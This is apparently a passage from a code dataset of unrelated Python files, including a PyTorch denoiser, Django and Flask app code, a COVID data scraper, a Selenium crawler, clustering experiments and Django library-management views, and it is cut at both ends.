        l = [0 for _ in range(D//2+1)]
        l.extend([i for i in range(D+1-(D//2+1))])
        l.append(l[-1])
        # holes and dilations for convolution layers
        holes = [2**(kl[0]-kl[1])-1 for kl in zip(k, l)]
        dilations = [i+1 for i in holes]
        # convolution layers (padding == dilation keeps "same" spatial size)
        self.conv = nn.ModuleList()
        self.conv.append(
            nn.Conv2d(3, C, 3, padding=dilations[0], dilation=dilations[0]))
        self.conv.extend([nn.Conv2d(C, C, 3, padding=dilations[i+1],
                                    dilation=dilations[i+1]) for i in range(D)])
        self.conv.append(
            nn.Conv2d(C, 3, 3, padding=dilations[-1], dilation=dilations[-1]))
        # apply He's initialization to every conv layer except the last
        for i in range(len(self.conv[:-1])):
            nn.init.kaiming_normal_(
                self.conv[i].weight.data, nonlinearity='relu')
        # batch normalization
        # BUG FIX: ``nn.BatchNorm2d(C, C)`` passed C as the *eps* argument
        # (eps=64 instead of the default 1e-5), crippling normalization.
        self.bn = nn.ModuleList()
        self.bn.extend([nn.BatchNorm2d(C) for _ in range(D)])
        # initialize the weights of the Batch normalization layers
        for i in range(D):
            nn.init.constant_(self.bn[i].weight.data, 1.25 * np.sqrt(C))

    def forward(self, x):
        """Three-stage forward (encoder / bottleneck / decoder with skips)."""
        D = self.D
        h = F.relu(self.conv[0](x))
        h_buff = []  # activations saved for the decoder's skip connections
        for i in range(D//2 - 1):
            # benchmark is toggled around each dilated conv -- presumably a
            # cudnn autotuning workaround; TODO confirm it is still needed.
            torch.backends.cudnn.benchmark = True
            h = self.conv[i+1](h)
            torch.backends.cudnn.benchmark = False
            h = F.relu(self.bn[i](h))
            h_buff.append(h)
        for i in range(D//2 - 1, D//2 + 1):
            torch.backends.cudnn.benchmark = True
            h = self.conv[i+1](h)
            torch.backends.cudnn.benchmark = False
            h = F.relu(self.bn[i](h))
        for i in range(D//2 + 1, D):
            j = i - (D//2 + 1) + 1
            torch.backends.cudnn.benchmark = True
            # /sqrt(2) keeps the variance of the summed skip connection stable
            h = self.conv[i+1]((h + h_buff[-j]) / np.sqrt(2))
            torch.backends.cudnn.benchmark = False
            h = F.relu(self.bn[i](h))
        y = self.conv[D+1](h) + x
        return y
|
7,627 | 991b124d365443744c946b258504c97e9076dcea | from django.urls import path, include
from django.conf.urls import url, re_path
#from rest_framework.urlpatterns import format_suffix_patterns
from .views import (HomePageView,
WordViewSet, WordNormalViewSet,
TextViewSet, TextNormalViewSet, TextTagViewSet,
TagSetViewSet, TagViewSet, TokenViewSet, TokenTagViewSet,
ValidatorViewSet, NormalizerViewSet,
TaggerViewSet,
)
from rest_framework.routers import DefaultRouter, SimpleRouter
class OptionalSlashRouter(DefaultRouter):
    """DRF router whose routes match both ``/path`` and ``/path/``."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # '/?' makes the trailing slash optional in every generated regex.
        self.trailing_slash = '/?'
router = OptionalSlashRouter()
router.register(r'words', WordViewSet)
router.register(r'word-normals', WordNormalViewSet)
router.register(r'texts', TextViewSet)
router.register(r'text-normals', TextNormalViewSet)
router.register(r'text-tags', TextTagViewSet)
router.register(r'tag-sets', TagSetViewSet)
router.register(r'tags', TagViewSet)
router.register(r'tokens', TokenViewSet)
router.register(r'token-tags', TokenTagViewSet)
router.register(r'validators', ValidatorViewSet)
router.register(r'normalizers', NormalizerViewSet)
router.register(r'taggers', TaggerViewSet)
# router.register(r'sentences', SentenceViewSet)
# router.register(r'normal-sentences', NormalSentenceViewSet)
# router.register(r'tagged-sentences', TaggedSentenceViewSet)
# router.register(r'rules/translation-characters', TranslationCharacterViewSet)
# router.register(r'rules/refinement-patt/erns', RefinementPatternViewSet)
urlpatterns = [
re_path(r'^$', HomePageView.as_view(), name='home'),
re_path(r'^api/', include(router.urls)),
]
# urlpatterns = [
# # url('', HomePageView.as_view(), name = 'home'),
# path('', views.index, name='home'),
# path('word/', WordCreateView.as_view(), name="words"),
# path('word/<int:pk>/', WordDetailsView.as_view(), name="word"),
# path('text/fix/', views.fix_text, name="fix_text"),
# ]
#urlpatterns = format_suffix_patterns(urlpatterns)
# class OptionalSlashRouter(SimpleRouter):
# def __init__(self):
# self.trailing_slash = '/?'
# super().__init__()
# # super(SimpleRouter, self).__init__()
# router.register(r'', HomeViewSet, basename='home')
# router.register(r'api', router.APIRootView, basename='api')
# router.register(r'schema', router.APISchemaView, basename='schema') |
7,628 | 98a1fab8cee91f37ceee2cfd868d3a5756a055b0 | import numpy as np
from sklearn.naive_bayes import BernoulliNB
# Minimal BernoulliNB demo on a tiny 3-sample, 4-feature dataset.
X = np.array([[1, 2, 3, 3], [1, 3, 4, 4], [2, 4, 5, 5]])
y = np.array([1, 2, 3])
"""
alpha: 平滑系数
binarize: 将特征二值化的阈值
fit_prior: 使用数据拟合先验概率
"""
# (Translation of the note above)
# alpha: additive smoothing coefficient
# binarize: threshold used to binarize the features
# fit_prior: learn class prior probabilities from the data
clf = BernoulliNB(alpha=2.0, binarize=3.0, fit_prior=True)
clf.fit(X, y)
print("class_prior:", clf.class_prior)
print("class_count_:", clf.class_count_) # sample count per class, in class order
print("class_log_prior_:", clf.class_log_prior_) # log of the class priors
print("feature_count_:", clf.feature_count_) # per-class sum of each feature
print("n_features_:", clf.n_features_)
print("feature_log_prob_:", clf.feature_log_prob_) # log P(feature | class)
# Other parameters and methods are similar to MultinomialNB.
|
7,629 | fd4d785d933c3a200f4aba094ecfe1e1c76737a5 | from django.apps import AppConfig
class Sharem8Config(AppConfig):
    """Django application configuration for the ShareM8 app."""
    name = 'ShareM8'
|
7,630 | 235623c3f557dbc28fbff855a618e4d26932ca65 | from . import cli
cli.run()
|
7,631 | 06627821c09d02543974a3c90664e84e11c980ed | """PriceTrail URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth import views as auth_views
from .views import validate_product, display_product
#user related views
from .views import index_view, login_view, register_view, profile_view
#products related views
from .views import my_products_view, delete_product, add_new_product, dashboard_view, test_email_notifications, edit_profile_view, product_details_view, \
test_update_prices, test_update_all_prices
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name='logout'),
# implemented views
url(r'^$', index_view, name='index'),#this will became index
url(r'^login/$', login_view, name='login'),
url(r'^register/$', register_view, name='register'),
url(r'^profile/$', profile_view, name='profile'),
url(r'^my-products/$', my_products_view, name='my-products'),
url(r'^my-products/(?P<filter>[\w-]+)', my_products_view, name='my-products'),
url(r'^delete-product/(?P<id>\d+)/', delete_product, name='delete-product'),
url(r'^add-new-product/$', add_new_product, name='add-new-product'),
url(r'^validate-product/$', validate_product, name='validate-product'),
url(r'^dashboard/$', dashboard_view, name='dashboard'),
url(r'^edit-profile/$', edit_profile_view, name='edit-profile'),
#modal window
url(r'^display-product/(?P<id>\d+)/', display_product, name='display-product'),
url(r'^product-details/(?P<id>\d+)/', product_details_view, name='product-details'),
#superuser endpoints
url(r'^test_notifications/$', test_email_notifications, name='test-view'),
url(r'^test_update_prices/(?P<id>\w+)/', test_update_prices, name='update-prices'),
url(r'^test_update_all_prices/$', test_update_all_prices, name='update-all-prices'),
]
|
7,632 | f1d813ccaf49c8941bf594e22d8683c0ab422a22 | from flask import Flask
from flask_bcrypt import Bcrypt
from flask_jwt_extended import JWTManager
from flask_migrate import Migrate
from flask_restful import Api
from flask_apispec.extension import FlaskApiSpec
from server.admin import add_admin
from server.config import Config
from server.db import db
from server.cli import add_commands
from server.login_manager import login_manager
from server.resources import add_routes, register_docs
from server.services import user_service, token_blacklist
app = Flask(__name__)
app.config.from_object(Config)
db.init_app(app)
migrate = Migrate(app, db)
admin = add_admin(app)
api = Api(app, catch_all_404s=True)
jwt = JWTManager(app)
bcrypt = Bcrypt(app)
@jwt.user_lookup_loader
def user_loader_callback(_jwt_header, jwt_data):
    # Resolve the authenticated user from the JWT 'sub' claim (user id).
    return user_service.first(id=jwt_data['sub'])
@jwt.user_identity_loader
def user_identity_lookup(email):
    # Store the user's numeric id (looked up by email) as the JWT identity.
    return user_service.first(email=email).id
@jwt.token_in_blocklist_loader
def check_if_token_in_blocklist(jwt_headers, jwt_payload):
    # A token counts as revoked when its unique 'jti' is in the blacklist.
    return bool(token_blacklist.get(jwt_payload['jti']))
def create_app():
    """Finish wiring the module-level Flask app (routes, CLI commands,
    login manager, API docs) and return it."""
    add_routes(api)
    add_commands(app)
    login_manager.init_app(app)
    docs = FlaskApiSpec(app)
    register_docs(docs)
    return app
|
7,633 | 0677e12bc9733c76bff7ed3fe83e3800e64e9a10 | import re
import requests
import numpy as np
import json
import os
from collections import OrderedDict
import pandas as pd
import json
import datetime
import time
# Write a list to a JSON file (for convenient reading back with pandas).
def write_list_to_json(list, json_file_name, json_file_save_path):
    # NOTE(review): the parameter ``list`` shadows the builtin, and
    # os.chdir changes the process-wide working directory as a side
    # effect -- later relative paths in this module rely on that.
    os.chdir(json_file_save_path)
    with open(json_file_name, 'w') as f:
        json.dump(list, f)
# Data-fetching routine.
def getworld_data(url,header):
    """Download *url* and regex-extract per-country COVID series tuples.

    Each returned tuple holds, as raw strings: country, active, confirmed,
    deaths, recovered, and the relative_* series with their start dates
    (the capture-group order of ``pattern_1`` below).
    """
    headers = header
    res = requests.get(url,headers = headers)
    res.encoding = "UTF-8"
    # First capture the whole embedded data blob from the page...
    pattern = re.compile('(\'\{"(\w+)":{"active":(.*?),"confirmed":(.*?),"deaths":(.*?),"recovered":(.*?),"relative_active":(.*?),"relative_active_start_date":(.*?),"relative_confirmed":(.*?),"relative_confirmed_start_date":(.*?),"relative_deaths":(.*?),"relative_deaths_start_date":(.*?),"relative_recovered":(.*?),"relative_recovered_start_date":(.*?)}\}\')',re.S)
    end = re.findall(pattern,res.text)
    a=str(end[0])
    # Debug dump of the raw match for offline inspection.
    with open('test.txt','w') as f:
        f.write(a)
    # NOTE(review): unused local.
    data_relative_confirmed_json=[]
    # ...then split the blob into one tuple per country.
    pattern_1 = re.compile('(\w+)":{"active":(.*?),"confirmed":(.*?),"deaths":(.*?),"recovered":(.*?),"relative_active":(.*?),"relative_active_start_date":(.*?),"relative_confirmed":(.*?),"relative_confirmed_start_date":(.*?),"relative_deaths":(.*?),"relative_deaths_start_date":(.*?),"relative_recovered":(.*?),"relative_recovered_start_date":(.*?)}',re.S)
    end_1=re.findall(pattern_1,a)
    return end_1
# Date-reconstruction routine: pair each country's series values with dates.
def count_time(end_1):
    """Build one OrderedDict per country mapping ISO dates to series values.

    *end_1* is the tuple list from getworld_data(); index 0 is the country
    name, index 5 the relative_active series and index 6 its start date in
    "M/D/Y" form.  Returns a list of {'Country': ..., date: value, ...}.
    """
    data_relative_confirmed_json=[]
    country=[]
    for i in range(len(end_1)):
        data={
            'Country':'',
        }
        data['Country']=end_1[i][0]
        # (orig. note: "confirmed cases") -- collects the country names.
        country.append(end_1[i][0])
        care=end_1[i][5].replace('[','').replace(']','').split(',')
        try:
            # Parse the "M/D/Y" start date; the year field is forced to 2020.
            time=end_1[i][6].replace('/',',').replace('/',',').replace('"','').split(',')
            print(time)
            time[2]='2020'
            date=[]
            in_date = time[2]+'-'+time[0]+'-'+time[1]
            dt = datetime.datetime.strptime(in_date, "%Y-%m-%d")
            # Generate one date per value, starting the day AFTER in_date.
            for k in range(len(end_1[i][5].replace('[','').replace(']','').split(','))):
                out_date = (dt + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
                dt=datetime.datetime.strptime(out_date, "%Y-%m-%d")
                date.append(out_date)
            print(date)
            time_care=OrderedDict(zip(date,care))
            print(time_care)
            date_json=OrderedDict(data,**time_care)
            data_relative_confirmed_json.append(date_json)
        except:
            # NOTE(review): bare except silently drops any country whose
            # date field fails to parse -- consider logging.
            pass
    return data_relative_confirmed_json
def write_json_to_csv(data_relative_confirmed_json,end_1):
    """Persist the per-country dicts as JSON, then pivot to a dated CSV.

    Entry 36 of *end_1* is used purely as a template to regenerate the
    list of date column headers before reordering and transposing.
    """
    write_list_to_json(data_relative_confirmed_json,'20200517-world-active-data.json','E:/python_code/world_cov19')
    data_csv=pd.DataFrame(json.loads(open('20200517-world-active-data.json','r+').read()))
    # NOTE(review): index 36 is hard-coded; this breaks if fewer than 37
    # countries were parsed.
    print(end_1[36][0])
    care=end_1[36][5].replace('[','').replace(']','').split(',')
    try:
        # Same date-reconstruction logic as count_time(), applied once.
        time=end_1[36][6].replace('/',',').replace('/',',').replace('"','').split(',')
        print(time)
        time[2]='2020'
        date=[]
        in_date = time[2]+'-'+time[0]+'-'+time[1]
        dt = datetime.datetime.strptime(in_date, "%Y-%m-%d")
        for k in range(len(end_1[36][5].replace('[','').replace(']','').split(','))):
            out_date = (dt + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
            dt=datetime.datetime.strptime(out_date, "%Y-%m-%d")
            date.append(out_date)
        print(date)
        time_care=OrderedDict(zip(date,care))
        print(time_care)
    except:
        # NOTE(review): if this fires, ``date`` below is unbound (NameError).
        pass
    date.insert(0,'Country')
    cols=date
    data_csv=data_csv.loc[:,cols]
    # NOTE(review): this transpose result is discarded (no assignment).
    data_csv.T
    data_csv.to_csv('20200517-world-active-data.json.csv')
    df=pd.read_csv('20200517-world-active-data.json.csv')
    new_csv=df.T
    new_csv.to_csv('20200517-world-active-data.json.csv')
|
7,634 | 5807d1c2318ffa19d237d77fbe3f4c1d51da8601 | import numpy as np
import matplotlib.pyplot as plt
from sklearn import mixture, metrics
import utils
import spsa_clustering
N = 5000
mix_prob = np.array([0.4, 0.4, 0.2])
clust_means = np.array([[0, 0], [2, 2], [-3, 6]])
clust_gammas = np.array([[[1, -0.7], [-0.7, 1]], np.eye(2), [[1, 0.8], [0.8, 1]]])
data_set = []
true_labels = []
spsa_gamma = 1. / 6
spsa_alpha = lambda x: 0.25 / (x ** spsa_gamma)
spsa_beta = lambda x: 15. / (x ** (spsa_gamma / 4))
# spsa_alpha = lambda x: 0.001
# spsa_beta = lambda x: 0.001
clustering = spsa_clustering.ClusteringSPSA(n_clusters=clust_means.shape[0], data_shape=2, Gammas=None, alpha=spsa_alpha,
beta=spsa_beta, norm_init=False, eta=1000)
for _ in range(N):
mix_ind = np.random.choice(len(mix_prob), p=mix_prob)
data_point = np.random.multivariate_normal(clust_means[mix_ind],
clust_gammas[mix_ind])
data_set.append(data_point)
true_labels.append(mix_ind)
clustering.fit(data_point)
data_set = np.array(data_set)
utils.order_clust_centers(clust_means, clustering)
clustering.clusters_fill(data_set)
gmm = mixture.GaussianMixture(n_components=clust_means.shape[0], init_params='kmeans')
gmm.fit(data_set)
labels_pred_gmm = gmm.predict(data_set)
bgmm = mixture.BayesianGaussianMixture(n_components=clust_means.shape[0], init_params='random')
bgmm.fit(data_set)
labels_pred_bgmm = bgmm.predict(data_set)
ari_gmm = metrics.adjusted_rand_score(true_labels, labels_pred_gmm)
print('\nARI GMM: {:f}'.format(ari_gmm))
ari_bgmm = metrics.adjusted_rand_score(true_labels, labels_pred_bgmm)
print('ARI Bayesian GMM: {:f}'.format(ari_bgmm))
ari_spsa = metrics.adjusted_rand_score(true_labels, clustering.labels_)
print('ARI SPSA clustering: {:f}'.format(ari_spsa))
print('\n')
for i in range(clust_means.shape[0]):
print('GMM covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - gmm.covariances_[i])))
print('\n')
for i in range(clust_means.shape[0]):
print('Bayesian GMM covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - bgmm.covariances_[i])))
print('\n')
for i in range(clust_means.shape[0]):
print('SPSA clustering covar matrix distance {0}: {1:f}'.format(i,
np.linalg.norm(clust_gammas[i] - clustering.Gammas[i])))
plt.style.use('grayscale')
utils.plot_centers(clust_means, clustering)
utils.plot_centers_converg(clust_means, clustering)
# utils.plot_clustering_cov(data_set, clustering.labels_, 'SPSA clustering partition', clustering.cluster_centers_,
# clustering.Gammas)
# utils.plot_clustering_cov(data_set, true_labels, 'True partition', clust_means, clust_gammas)
# utils.plot_clustering_cov(data_set, labels_pred_gmm, 'GMM partition', gmm.means_, gmm.covariances_)
# utils.plot_clustering_cov(data_set, labels_pred_bgmm, 'Bayesian GMM partition', bgmm.means_, bgmm.covariances_)
plt.show()
|
7,635 | 2f7be68f08716d5d04d064d81eecb53eb9b80174 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-03 14:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Productor.edad: an age-bracket choice (1 = under 35, 2 = over 35)."""
    dependencies = [
        ('productores', '0002_auto_20170327_0841'),
    ]
    operations = [
        migrations.AddField(
            model_name='productor',
            name='edad',
            # editable=False hides the field from forms/admin; the one-off
            # default=1 backfills existing rows (preserve_default=False).
            field=models.IntegerField(choices=[(1, 'Menor 35'), (2, 'Mayor 35')], default=1, editable=False),
            preserve_default=False,
        ),
    ]
|
7,636 | 44d1412d48886eb9126a895d61004e6ccbd4850b | #!/usr/bin/env python
import sys
import random
def apply(mine, target, diff):
    """Shift *mine* by *diff* positions, XOR it into *target* in place,
    and return how many cells of *target* remain set afterwards.

    Both ``mine`` and ``target`` are 4-element 0/1 lists and are MUTATED.
    Returns -1 immediately (no mutation) when either hand is already the
    all-ones pattern.
    """
    if [1, 1, 1, 1] in (mine, target):
        return -1
    if diff != 0:
        # Build the shifted hand from the pre-shift values; cells shifted
        # in from outside the 4-cell board become 0.
        shifted = [
            mine[i - diff] if 0 <= i - diff < 4 else 0
            for i in range(4)
        ]
        mine[:] = shifted
    live = 0
    for i in range(4):
        target[i] ^= mine[i]
        if target[i]:
            live += 1
    return live
# Game driver loop (PYTHON 2 ONLY: uses raw_input and print statements).
# Each round: read the turn number and both players' two 4-cell hands,
# then emit a random choice among the moves (i, j, k) -- our hand i vs
# opponent hand j shifted by k -- that score highest under apply().
while True:
    turn = int(raw_input())
    finger = [[], []]
    for i in range(0, 2):
        for j in range(0, 2):
            finger[i].append([int(k) for k in raw_input().split()])
    maximum = -1
    response = []
    for i in range(0, 2):
        for j in range(0, 2):
            for k in range(-3, 4):
                # NOTE(review): apply() mutates the hand lists in place,
                # so later candidate evaluations see boards already
                # modified by earlier ones -- verify this is intended.
                result = apply(finger[0][i], finger[1][j], k)
                if result > maximum:
                    maximum = result
                    response = [(i, j, k)]
                elif result == maximum:
                    response.append((i, j, k))
    if maximum != -1:
        print ' '.join([str(i) for i in random.choice(response)])
    else:
        # No legal scoring move: emit the sentinel pass move.
        print '2 2 0'
    sys.stdout.flush()
|
7,637 | 069d85370d8358aa884b5195a1b52c0014efd161 | from collections import Counter
class Solution:
    def minDominoRotations(self, A: List[int], B: List[int]) -> int:
        """Minimum rotations so one row (A or B) becomes all one value; -1 if impossible.

        A value T can fill a row iff every position i satisfies
        A[i] == T or B[i] == T.  Candidate (target, row) pairs are tried
        in decreasing frequency order, so the first feasible candidate
        needs the fewest rotations.
        """
        if not A or not B:
            return 0
        if len(A) != len(B):
            return -1
        cnt_a, cnt_b = Counter(A), Counter(B)
        candidates = []
        for num, freq in cnt_a.items():
            candidates.append((freq, num, 'a'))
        for num, freq in cnt_b.items():
            candidates.append((freq, num, 'b'))
        candidates.sort(reverse=True)
        for freq, target, row in candidates:
            if row == 'a':
                to_list, from_list = A, B
            else:
                to_list, from_list = B, A
            # BUG FIX: the rotation counter must restart for every
            # candidate.  The original initialized ``cnt`` once before the
            # loop, so increments from failed candidates leaked into later
            # ones and inflated the answer (e.g. A=[9,9,2,2], B=[2,2,9,8]
            # returned 3 instead of 2).
            rotations = 0
            feasible = True
            for i in range(len(A)):
                if to_list[i] == target:
                    continue
                if from_list[i] != target:
                    feasible = False
                    break
                rotations += 1
            if feasible:
                return rotations
        return -1
|
7,638 | 45658cdfcd1529bbf803294cd7cec32d6d2c2198 | import pygame
class DrawingBrush():
    """Circle-stamp brush drawing onto a per-pixel-alpha overlay surface
    that is blitted over the current pygame display on Update()."""
    def __init__(self, size, color, radius):
        # SRCALPHA overlay so cleared/undrawn areas stay transparent.
        self.drawSurface = pygame.Surface(size, pygame.SRCALPHA, 32).convert_alpha()
        self.drawColor = color
        self.size = radius
        self.winSize = size
        self.winSurface = pygame.display.get_surface()
    def Draw(self, pos):
        # Stamp one filled circle of the brush colour/radius at *pos*.
        pygame.draw.circle(self.drawSurface, self.drawColor, pos, self.size)
    def Clear(self):
        # Discard all strokes by allocating a fresh transparent overlay.
        self.drawSurface = pygame.Surface(self.winSize, pygame.SRCALPHA, 32).convert_alpha()
    def Update(self):
        # Composite the overlay onto the window at the origin.
        self.winSurface.blit(self.drawSurface, [0,0])
7,639 | bf160bd2fc924a11d340bd466b4a879d1cdcd86e | # Generated by Django 3.1.7 on 2021-03-20 14:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Order.phone and alter Order.order_no's default."""
    dependencies = [
        ('restapp', '0021_auto_20210320_1421'),
    ]
    operations = [
        migrations.AddField(
            model_name='order',
            name='phone',
            field=models.CharField(max_length=13, null=True),
        ),
        migrations.AlterField(
            model_name='order',
            name='order_no',
            # NOTE(review): 'G2QYWH30' was generated once at makemigrations
            # time, so every new row gets this same literal default rather
            # than a fresh code -- a callable default was likely intended.
            field=models.CharField(default='G2QYWH30', max_length=10),
        ),
    ]
|
7,640 | 5f022b7f20b8aef1e3538a6b1e69dc302752cdc7 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import re
import sys
import time
import os
# Create a "download" folder in the current working directory.
dirPath = "download"
try:
    if not (os.path.isdir(dirPath)):
        os.makedirs(os.path.join(dirPath))
except OSError as e:
    print("{0} Failed to create directory!!!!!".format(dirPath))
# Chrome download options: save files into ./download without prompting.
donwload_loc = "{0}\\download".format(os.getcwd())  # NOTE(review): variable-name typo kept as-is
options = webdriver.ChromeOptions()
options.add_experimental_option("prefs", {
    "download.default_directory": donwload_loc,
    "download.prompt_for_download": False,
    "download.directory_upgrade": True,
    "safebrowsing_for_trusted_sources_enabled": False,
    "safebrowsing.enabled": False
})
# Path to the chromedriver executable.
chromedriver = '../chromedriver/chromedriver.exe'
driver = webdriver.Chrome(chromedriver, chrome_options=options)
# The very first URL of the crawl.
# url = 'http://www.k-heritage.tv/brd/board/909/L/CATEGORY/911/menu/901?brdType=R&thisPage=1&bbIdx=20474&searchField=&searchText='
# An intermediate URL (resume point for the crawl).
url = 'http://www.k-heritage.tv/brd/board/909/L/CATEGORY/911/menu/901?brdType=R&thisPage=1&bbIdx=17438&searchField=&searchText='
# Follow the "next post" link until a '#n' placeholder URL is reached.
while '#n' not in url:
    # Load the current post.
    driver.get(url)
    # Wait until the .media_wrap element has been created.
    mediaWrap = WebDriverWait(driver, 2).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, ".media_wrap")))
    # Remember the next post's URL before navigating away.
    next_url = driver.find_elements_by_css_selector('div.thumList>dl>dd>a')[0].get_attribute('href')
    try:
        # If the post has .hwp attachments, download each one.
        aTagList = driver.find_elements_by_css_selector("dl.b_file dd li a")
        file_list = []
        for aTag in aTagList:
            if ".hwp" in aTag.text:
                file_list.append(aTag.get_attribute('href'))
        for file_url in file_list:
            driver.get(file_url)
            time.sleep(1.3)  # give Chrome time to start the download
        # If there were no .hwp files, save the relevant HTML fragment as XML.
        if len(file_list) == 0:
            title = driver.find_elements_by_css_selector('p.sub_tit2 em.sub_mode')[0].text
            # Strip characters that Windows forbids in file names.
            title = re.sub(r"[\\|\/|\:|\*|\?|\"|\<|\>|\|]",'',title)
            xml_file = open('download\\{0}.xml'.format(title),mode="wt", encoding="utf-8")
            xml_file.write(driver.find_elements_by_css_selector('div.type_cont')[0].get_attribute('innerHTML'))
    except IndexError:
        # Occasionally a file-download URL errors out; reload the post and
        # fall back to saving the page content as XML instead.
        driver.get(url)
        mediaWrap = WebDriverWait(driver, 2).until(
            EC.presence_of_element_located((By.CSS_SELECTOR, ".media_wrap")))
        title = driver.find_elements_by_css_selector('p.sub_tit2 em.sub_mode')[0].text
        title = re.sub(r"[\\|\/|\:|\*|\?|\"|\<|\>|\|]",'',title)
        xml_file = open('download\\{0}.xml'.format(title),mode="wt", encoding="utf-8")
        # Determine which layout variant this post uses and save that block.
        info_agree = driver.find_elements_by_css_selector('div.info_agree')
        type_cont = driver.find_elements_by_css_selector('.media_wrap .type_cont')
        card_cont_info = driver.find_elements_by_css_selector('.media_wrap .card_cont_info')
        if len(info_agree) > 0:
            xml_file.write(info_agree[0].get_attribute('innerHTML'))
        elif len(type_cont) > 0:
            xml_file.write(type_cont[0].get_attribute('innerHTML'))
        elif len(card_cont_info) > 0:
            xml_file.write(card_cont_info[0].get_attribute('innerHTML'))
    except:
        # NOTE(review): bare except swallows all other failures;
        # it only logs the URL and moves on to the next post.
        print("Unexpected error:", sys.exc_info()[0])
        print('{0} error '.format(driver.current_url))
    finally:
        # Advance to the next post regardless of what happened above.
        url = next_url
driver.quit()
|
7,641 | c12d45644098aef5c042a62095eeae5829d70f45 | #! /usr/bin/python
# encode:utf-8
import subprocess
import sys
import pdb
# NOTE: this file is Python 2 (print statements).
# Usage: script.py <word> -- prints /etc entries whose name contains <word>.
argvs = sys.argv
if len(argvs) != 2:
    print "Please input 1 argument"
    quit()
searchWord = argvs[1]
# List everything (including dotfiles) under /etc via `ls -a`.
cmd1 = "ls -a /etc/"
p1 = subprocess.Popen(cmd1.strip().split(" "), stdout=subprocess.PIPE)
stdout_data, stderr_data = p1.communicate()
p1.stdout.close()
# NOTE(review): stderr was not redirected to a PIPE, so communicate()
# always returns stderr_data = None and this branch can never fire.
if stderr_data != None:
    print "Error", stderr_data
    quit()
filelist = stdout_data.strip().split("\n")
# Print every entry whose name contains the search word.
for file in filelist:
    if file.find(searchWord) != -1:
        print file
|
7,642 | ce9e1ac0f1596ba4db904289f91f5ab95c2de4b8 | from django.shortcuts import render,redirect
from django.http import HttpResponseRedirect
from . import forms,models
from django.contrib.auth.models import Group
from django.contrib import auth
from django.contrib.auth.decorators import login_required,user_passes_test
from datetime import datetime,timedelta,date
from django.core.mail import send_mail
from librarymanagement.settings import EMAIL_HOST_USER
from django.contrib import messages
#from django.contib.auth.models import user, auth
def home_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/index.html')
# for showing blog content to users
#for showing signup/login button for student
def studentclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/student_click.html')
#for showing signup/login button for teacher
def adminclick_view(request):
if request.user.is_authenticated:
return HttpResponseRedirect('afterlogin')
return render(request,'library/admin_click.html')
def adminsignup_view(request):
form=forms.AdminSigupForm()
if request.method=='POST':
form=forms.AdminSigupForm(request.POST)
if form.is_valid():
user=form.save()
user.set_password(user.password)
user.save()
my_admin_group = Group.objects.get_or_create(name='ADMIN')
my_admin_group[0].user_set.add(user)
return HttpResponseRedirect('adminlogin')
return render(request,'library/admin_signup.html',{'form':form})
def studentsignup_view(request):
form1=forms.StudentUserForm()
form2=forms.StudentExtraForm()
mydict={'form1':form1,'form2':form2}
if request.method=='POST':
form1=forms.StudentUserForm(request.POST)
form2=forms.StudentExtraForm(request.POST)
if form1.is_valid() and form2.is_valid():
user=form1.save()
user.set_password(user.password)
user.save()
f2=form2.save(commit=False)
f2.user=user
user2=f2.save()
my_student_group = Group.objects.get_or_create(name='STUDENT')
my_student_group[0].user_set.add(user)
return HttpResponseRedirect('studentlogin')
return render(request,'library/student_signup.html',context=mydict)
def is_admin(user):
    """Return True when *user* belongs to the 'ADMIN' group."""
    admin_groups = user.groups.filter(name='ADMIN')
    return admin_groups.exists()
def afterlogin_view(request):
if is_admin(request.user):
return render(request,'library/admin_afterlogin.html')
else:
return render(request,'library/student_afterlogin.html')
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def addbook_view(request):
#now it is empty book form for sending to html
form=forms.BookForm()
if request.method=='POST':
#now this form have data from html
form=forms.BookForm(request.POST)
if form.is_valid():
user=form.save()
return render(request,'library/book_added.html')
return render(request,'library/add_book.html',{'form':form})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewbook_view(request):
books=models.Book.objects.all()
return render(request,'library/view_book.html',{'books':books})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def issuebook_view(request):
form=forms.IssuedBookForm()
if request.method=='POST':
#now this form have data from html
form=forms.IssuedBookForm(request.POST)
if form.is_valid():
obj=models.IssuedBook()
obj.enrollment=request.POST.get('enrollment2')
obj.isbn=request.POST.get('isbn2')
obj.save()
return render(request,'library/book_issued.html')
return render(request,'library/issue_book.html',{'form':form})
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def viewissuedbook_view(request):
    # Admin view: build (student name, enrollment, book name, author,
    # issue date, expiry date, fine) tuples for every issued book.
    issuedbooks=models.IssuedBook.objects.all()
    li=[]
    for lb in issuedbooks:
        # Format dates as d-m-Y by hand.
        issdate=str(lb.issuedate.day)+'-'+str(lb.issuedate.month)+'-'+str(lb.issuedate.year)
        expdate=str(lb.expirydate.day)+'-'+str(lb.expirydate.month)+'-'+str(lb.expirydate.year)
        #fine calculation
        # Rs. 10 per day past a 20-day grace period.
        # NOTE(review): assumes lb.issuedate is a datetime.date -- a
        # DateTimeField would make this subtraction raise; confirm the model.
